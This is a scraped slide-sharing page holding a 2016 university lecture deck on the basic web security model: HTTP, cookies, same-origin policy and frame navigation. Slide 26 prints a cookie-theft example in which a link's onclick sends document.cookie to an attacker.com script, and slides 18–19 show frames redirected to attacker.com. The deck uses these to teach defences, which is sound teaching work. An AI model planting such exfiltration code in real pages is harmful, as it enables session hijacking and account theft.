web security basic web security model spring 2016
play

Web Security: Basic Web Security Model Spring 2016 Franziska - PowerPoint PPT Presentation

Oct 23, 2022 •179 likes •498 views

CSE 484 / CSE M 584: Computer Security and Privacy Web Security: Basic Web Security Model Spring 2016 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, John Manferdelli, John

  1. CSE 484 / CSE M 584: Computer Security and Privacy Web Security: Basic Web Security Model Spring 2016 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, John Manferdelli, John Mitchell, Vitaly Shmatikov, Bennet Yee, and many others for sample slides and materials ... 4/28/16 1

  2. Admin • Lab 1 due tonight (8pm) – Submit your md5 hashes – Sploit files on codered.cs.washington.edu – Make sure your exploits work on codered! • Homework 2 due next Friday (8pm) • Lab 2 coming soon (web security) 4/28/16 CSE 484 / CSE M 584 - Spring 2016 2

  3. Big Picture: Browser and Network request website Browser reply OS Network Hardware 4/28/16 CSE 484 / CSE M 584 - Spring 2016 3

  4. HTTP: HyperText Transfer Protocol • Used to request and return data – Methods: GET, POST, HEAD, … • Stateless request/response protocol – Each request is independent of previous requests – Statelessness has a significant impact on design and implementation of applications • Evolution – HTTP 1.0: simple – HTTP 1.1: more complex 4/28/16 CSE 484 / CSE M 584 - Spring 2016 4

  5. HTTP Request Method File HTTP version Headers GET /default.asp HTTP/1.0 Accept: image/gif, image/x-bitmap, image/jpeg, */* Accept-Language: en User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95) Connection: Keep-Alive If-Modified-Since: Sunday, 17-Apr-96 04:32:58 GMT Blank line Data – none for GET 4/28/16 CSE 484 / CSE M 584 - Spring 2016 5

  6. HTTP Response HTTP version Status code Reason phrase Headers HTTP/1.0 200 OK Date: Sun, 21 Apr 1996 02:20:42 GMT Server: Microsoft-Internet-Information-Server/5.0 Connection: keep-alive Data Content-Type: text/html Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT Content-Length: 2543 <HTML> Some data... blah, blah, blah </HTML> 4/28/16 CSE 484 / CSE M 584 - Spring 2016 6

  7. Website Storing Info in Browser A cookie is a file created by a website to store information in the browser POST login.cgi username and pwd Browser Server HTTP Header: Set-cookie: NAME=VALUE ; domain = (who can read) ; If expires = NULL, expires = (when expires) ; this session only secure = (send only over HTTPS) GET restricted.html Browser Cookie: NAME=VALUE Server HTTP is a stateless protocol; cookies add state 4/28/16 CSE 484 / CSE M 584 - Spring 2016 7

  8. What Are Cookie Used For? • Authentication – The cookie proves to the website that the client previously authenticated correctly • Personalization – Helps the website recognize the user from a previous visit • Tracking – Follow the user from site to site; learn his/her browsing behavior, preferences, and so on 4/28/16 CSE 484 / CSE M 584 - Spring 2016 8

  9. Goals of Web Security • Safely browse the Web – A malicious website cannot steal information from or modify legitimate sites or otherwise harm the user… – … even if visited concurrently with a legitimate site -- in a separate browser window, tab, or even iframe on the same webpage • Support secure Web applications – Applications delivered over the Web should have the same security properties we require for standalone applications 4/28/16 CSE 484 / CSE M 584 - Spring 2016 9

  10. Two Sides of Web Security • Web browser – Responsible for securely confining Web content presented by visited websites • Web applications – Online merchants, banks, blogs, Google Apps … – Mix of server-side and client-side code • Server-side code written in PHP, Ruby, ASP, JSP… runs on the Web server • Client-side code written in JavaScript… runs in the Web browser – Many potential bugs: XSS, XSRF, SQL injection 4/29/16 CSE 484 / CSE M 584 - Spring 2016 10

  11. All of These Should Be Safe • Safe to visit an evil website • Safe to visit two pages at the same time • Safe delegation 4/28/16 CSE 484 / CSE M 584 - Spring 2016 11

  12. Where Does the Attacker Live? request website Browser Network reply attacker Web attacker OS Network Malware attacker Hardware 4/28/16 CSE 484 / CSE M 584 - Spring 2016 12

  13. Web Attacker • Controls a malicious website (attacker.com) – Can even obtain an SSL/TLS certificate for his site • User visits attacker.com – why? – Phishing email, enticing content, search results, placed by an ad network, blind luck … • Attacker has no other access to user machine! • Variation: “ iframe attacker ” – An iframe with malicious content included in an otherwise honest webpage • Syndicated advertising, mashups, etc. 4/28/16 CSE 484 / CSE M 584 - Spring 2016 13

  14. HTML and JavaScript Browser receives content, <html> displays HTML and executes scripts … <p> The script on this page adds two numbers <script> var num1, num2, sum num1 = prompt("Enter first number") num2 = prompt("Enter second number") sum = parseInt(num1) + parseInt(num2) alert("Sum = " + sum) </script> A potentially malicious webpage gets to … </html> execute some code on user’s machine! 4/28/16 CSE 484 / CSE M 584 - Spring 2016 14

  15. Browser Sandbox • Goal: safely execute JavaScript code provided by a website – No direct file access, limited access to OS, network, browser data, content that came from other websites • Same origin policy – Can only access properties of documents and windows from the same domain, protocol, and port 4/28/16 CSE 484 / CSE M 584 - Spring 2016 15

  16. Same-Origin Policy Website origin = (scheme, domain, port) [Example thanks to Wikipedia.] 4/28/16 CSE 484 / CSE M 584 - Spring 2016 16

  17. Same-Origin Policy: DOM Only code from same origin can access HTML elements on another site (or in an iframe). www.example.com www.evil.com www.example.co www.example.co m/iframe.html m/iframe.html www.example.com (the www.evil.com (the parent) parent) can access HTML cannot access HTML elements in the iframe elements in the iframe (and vice versa). (and vice versa). 4/28/16 CSE 484 / CSE M 584 - Spring 2016 17

  18. Who Can Navigate a Frame? awglogin window.open("https://www.attacker.com/...", "awglogin") window.open("https://www.google.com/...") If bad frame can navigate sibling frames, attacker gets password! 4/28/16 CSE 484 / CSE M 584 - Spring 2016 18

  19. Gadget Hijacking in Mashups top.frames[1].location = "http:/www.attacker.com/... “ ; top.frames[2].location = "http:/www.attacker.com/... “ ; ... 4/28/16 CSE 484 / CSE M 584 - Spring 2016 19

  20. Gadget Hijacking in Mashups Solution: Modern browsers only allow a frame to navigate its “descendent” frames 4/28/16 CSE 484 / CSE M 584 - Spring 2016 20

  21. Same-Origin Policy: Cookies • For cookies: Only code from same origin can read/write cookies associated with an origin. – Can be set via Javascript ( document.cookie=… ) or via Set-Cookie header in HTTP response. – Can narrow to subdomain/path (e.g., http://example.com can set cookie scoped to http://account.example.com/login .) (Caveats soon!) – Secure cookie: send only via HTTPS. – HttpOnly cookie: can’t access using JavaScript. 4/28/16 CSE 484 / CSE M 584 - Spring 2016 21

  22. Same-Origin Policy: Cookies • Browsers automatically include cookies with HTTP requests. • First-party cookie: belongs to top-level domain. • Third-party cookie: belongs to domain of embedded content. Bar’s Server www.bar.com’s www.bar.com cookie (1 st party) www.foo.com’s www.foo.com Foo’s Server cookie (3 rd party) 4/28/16 CSE 484 / CSE M 584 - Spring 2016 22

  23. Same Origin Policy: Cookie Writing domain: any domain suffix of URL-hostname, except top-level domain (TLD) Which cookies can be set by login .site.com ? allowed domains disallowed domains ü û login.site.com user.site.com ü û .site.com othersite.com û .com login.site.com can set cookies for all of .site.com but not for another site or TLD Problematic for sites like .washington.edu path: anything 4/28/16 CSE 484 / CSE M 584 - Spring 2016 23

  24. Who Set the Cookie? • Alice logs in at login.site.com – login.site.com sets session-id cookie for .site.com • Alice visits evil.site.com – Overwrites .site.com session-id cookie with session-id of user “ badguy ” -- not a violation of SOP! • Alice visits cse484.site.com to submit homework – cse484.site.com thinks it is talking to “ badguy ” • Problem: cse484.site.com expects session-id from login.site.com, cannot tell that session-id cookie has been overwritten by a “sibling” domain 4/28/16 CSE 484 / CSE M 584 - Spring 2016 24

  25. Path Separation is Not Secure • Cookie SOP: path separation – When the browser visits x.com/A , it does not send the cookies of x.com/B – This is done for efficiency, not security! • DOM SOP: no path separation – A script from x.com/A can read DOM of x.com/B <iframe src=“x.com/B"></iframe> alert(frames[0].document.cookie); 4/28/16 CSE 484 / CSE M 584 - Spring 2016 25

  26. Cookie Theft • Cookies often contain authentication token (more on this next week) – Stealing such a cookie == accessing account • Cookie theft via malicious JavaScript <a href="#" onclick="window.location='http:// attacker.com/stole.cgi?cookie=’+document.cookie; return false;">Click here!</a> • Cookie theft via network eavesdropping – Cookies included in HTTP requests – One of the reasons HTTPS is important! 4/28/16 CSE 484 / CSE M 584 - Spring 2016 26

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Web Security: Basic Web Security Model [continued] Spring

Web Security: Basic Web Security Model [continued] Spring

CSE 484 / CSE M 584: Computer Security and Privacy Web Security: Basic Web Security Model [continued] Spring 2015 Franziska (Franzi) Roesner

510 views • 18 slides
A (re)introduction to Spring Security Agenda Before Spring Security: Acegi security

A (re)introduction to Spring Security Agenda Before Spring Security: Acegi security

A (re)introduction to Spring Security Agenda Before Spring Security: Acegi security Introducing Spring Security View layer security Whats coming in Spring Security 3 E-mail: craig@habuma.com Blog: http://www.springloaded.info

452 views • 19 slides
Web Security [Browser Security Model] Spring 2020 Franziska (Franzi) Roesner

Web Security [Browser Security Model] Spring 2020 Franziska (Franzi) Roesner

CSE 484 / CSE M 584: Computer Security and Privacy Web Security [Browser Security Model] Spring 2020 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, Ada Lerner, John

810 views • 24 slides
Secure Networks Starting with Basic Reference Model for Security Architecture A Historic Review

Secure Networks Starting with Basic Reference Model for Security Architecture A Historic Review

Secure Networks Starting with Basic Reference Model for Security Architecture A Historic Review of a Nascent Industry Seattle University CSSE 572 Spring 2008 Mohsen Banan Guest Speaker May 15, 2008 Less Talked About Security

215 views • 19 slides
CS-527 Software Security Basic Security Principles Asst. Prof. Mathias Payer Department of

CS-527 Software Security Basic Security Principles Asst. Prof. Mathias Payer Department of

CS-527 Software Security Basic Security Principles Asst. Prof. Mathias Payer Department of Computer Science Purdue University TA: Kyriakos Ispoglou https://nebelwelt.net/teaching/17-527-SoftSec/ Spring 2017 Security goals Table of Contents

794 views • 26 slides
Web Security: Web Application Security Spring 2016 Franziska (Franzi) Roesner

Web Security: Web Application Security Spring 2016 Franziska (Franzi) Roesner

CSE 484 / CSE M 584: Computer Security and Privacy Web Security: Web Application Security Spring 2016 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, John Manferdelli, John

874 views • 34 slides
CSE484/CSE584 BASIC WEB SECURITY MODEL Dr. Benjamin Livshits Web Security Web Attacker Sets up

CSE484/CSE584 BASIC WEB SECURITY MODEL Dr. Benjamin Livshits Web Security Web Attacker Sets up

CSE484/CSE584 BASIC WEB SECURITY MODEL Dr. Benjamin Livshits Web Security Web Attacker Sets up malicious site visited by victim; no control of network Alice Network Security Network Attacker Intercepts and controls network communication

907 views • 44 slides
Usable Security [finish] &amp; Physical Security Spring 2016 Franziska (Franzi) Roesner

Usable Security [finish] &amp; Physical Security Spring 2016 Franziska (Franzi) Roesner

CSE 484 / CSE M 584: Computer Security and Privacy Usable Security [finish] &amp; Physical Security Spring 2016 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, John

395 views • 12 slides
CS590-SWS/527 Software Security OS Security Asst. Prof. Mathias Payer Department of Computer

CS590-SWS/527 Software Security OS Security Asst. Prof. Mathias Payer Department of Computer

CS590-SWS/527 Software Security OS Security Asst. Prof. Mathias Payer Department of Computer Science Purdue University TA: Kyriakos Ispoglou https://nebelwelt.net/teaching/16-527-SoftSec/ Spring 2016 Unix security model Table of Contents

505 views • 27 slides
The End of Software Security (and some Cryptography) Spring 2016 Ada (Adam) Lerner

The End of Software Security (and some Cryptography) Spring 2016 Ada (Adam) Lerner

CSE 484 / CSE M 584: Computer Security and Privacy The End of Software Security (and some Cryptography) Spring 2016 Ada (Adam) Lerner lerner@cs.washington.edu Thanks to Franzi Roesner, Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, John

870 views • 76 slides
Web Security Cyber Security Lab Spring '10 04/15/10 Cyber Security Lab 1 Outline Web

Web Security Cyber Security Lab Spring '10 04/15/10 Cyber Security Lab 1 Outline Web

Web Security Cyber Security Lab Spring '10 04/15/10 Cyber Security Lab 1 Outline Web application weaknesses XSS AJAX weaknesses SQL Injection Attacks (Slides from Lars Olson)

588 views • 41 slides
Chapter 7: Unix Security Chapter 7: 1 Objectives Understand the security features provided

Chapter 7: Unix Security Chapter 7: 1 Objectives Understand the security features provided

Chapter 7: Unix Security Chapter 7: 1 Objectives Understand the security features provided by a typical operating system. Introduce the basic Unix security model. See how general security principles are implemented in an actual

733 views • 59 slides
CSCI 8260 Spring 2016 Computer and Networks Security INTRODUCTION 1 Research in Computer

CSCI 8260 Spring 2016 Computer and Networks Security INTRODUCTION 1 Research in Computer

CSCI 8260 Spring 2016 Computer and Networks Security INTRODUCTION 1 Research in Computer Security Studies in what ways security mechanisms may fail Can we gain access to a computer system without authorizaDon? Can we compromise

986 views • 84 slides
CS 356 Lecture 27 Internet Security Protocols Spring 2013 Review Chapter 1: Basic

CS 356 Lecture 27 Internet Security Protocols Spring 2013 Review Chapter 1: Basic

CS 356 Lecture 27 Internet Security Protocols Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control Lists

685 views • 30 slides
CS 356 Lecture 25 and 26 Operating System Security Spring 2013 Review Chapter 1: Basic

CS 356 Lecture 25 and 26 Operating System Security Spring 2013 Review Chapter 1: Basic

CS 356 Lecture 25 and 26 Operating System Security Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control Lists

373 views • 36 slides
eDocument Security Awareness Model 2. eDocument Security Awareness Model THE EDOCUMENT SECURITY

eDocument Security Awareness Model 2. eDocument Security Awareness Model THE EDOCUMENT SECURITY

eDocument Security Awareness Model 2. eDocument Security Awareness Model THE EDOCUMENT SECURITY AWARENESS MODEL (ESAM) IS A SELF-ASSESSMENT TOOL GOAL OF THE EDOCUMENT SECURITY AWARENESS MODEL: Help governments with their secure document

579 views • 28 slides
What Parents Should Know About Assessments National PTA Webinar October 20, 2015 Lucille E. Davy

What Parents Should Know About Assessments National PTA Webinar October 20, 2015 Lucille E. Davy

What Parents Should Know About Assessments National PTA Webinar October 20, 2015 Lucille E. Davy Senior Advisor Why do we need new assessments? Multiple choice questions dont allow students to show everything theyve learned

715 views • 30 slides
Machine Learning on Knowledge Bases Marcus Pfeiffer 19th June 2018 Introduction Data

Machine Learning on Knowledge Bases Marcus Pfeiffer 19th June 2018 Introduction Data

Machine Learning on Knowledge Bases Marcus Pfeiffer 19th June 2018 Introduction Data Preprocessing Machine Learning Algorithms for Premise Selection Premise Selectors in Detail Comparison and Outlook 1 Introduction

903 views • 58 slides
Complete Completion using Types and Weights Tihomir Gvero, Viktor Kuncak, Ivan Kuraj and Ruzica

Complete Completion using Types and Weights Tihomir Gvero, Viktor Kuncak, Ivan Kuraj and Ruzica

Complete Completion using Types and Weights Tihomir Gvero, Viktor Kuncak, Ivan Kuraj and Ruzica Piskac 1 Motivation Large APIs and libraries ~4000 classes in Java 6.0 standard library Using those APIs (for the first time) can be

841 views • 58 slides
What to check when subscribing to online services a privacy perspective. Does the service

What to check when subscribing to online services a privacy perspective. Does the service

What to check when subscribing to online services a privacy perspective. Does the service provider have a clearly expressed and up to date privacy policy available on their website? The service provider should have a clearly expressed and

827 views • 3 slides
real estate syndicates real estate brokers/agents syndicators attorneys Investors property

real estate syndicates real estate brokers/agents syndicators attorneys Investors property

real estate syndicates real estate brokers/agents syndicators attorneys Investors property managers lenders objective provide knowledge to use syndications in group investments to solve any or all of the following issues: lack of

408 views • 9 slides
Linking UK Government Data John Sheridan Jeni Tennison Open Government Data International

Linking UK Government Data John Sheridan Jeni Tennison Open Government Data International

Linking UK Government Data John Sheridan Jeni Tennison Open Government Data International movement see the panel tomorrow! Linked data approach large-scale distributed publication extensibility and joinability addresses provenance &amp;

267 views • 7 slides
Link Prediction on Real and Li Sy Synthetic C c Comp mplex x Ne Networks Department of

Link Prediction on Real and Li Sy Synthetic C c Comp mplex x Ne Networks Department of

Link Prediction on Real and Li Sy Synthetic C c Comp mplex x Ne Networks Department of Information Engineering Ma Master Ca Candidate te: Umberto Michieli ervisors: Leonardo Badia (Universit degli Studi di Padova) Super Carlo

736 views • 18 slides
Exploratory Monitoring at Bing AUTOMATED SYNTHETIC EXPLORATORY MONITORING OF DYNAMIC WEB SITES

Exploratory Monitoring at Bing AUTOMATED SYNTHETIC EXPLORATORY MONITORING OF DYNAMIC WEB SITES

Exploratory Monitoring at Bing AUTOMATED SYNTHETIC EXPLORATORY MONITORING OF DYNAMIC WEB SITES USING SELENIUM Outline 1. Modern Engineering Principles 2. Monitoring Approaches 3. Statistical Models 4. Selenium 5. Exploratory Principles 6.

618 views • 26 slides

More recommend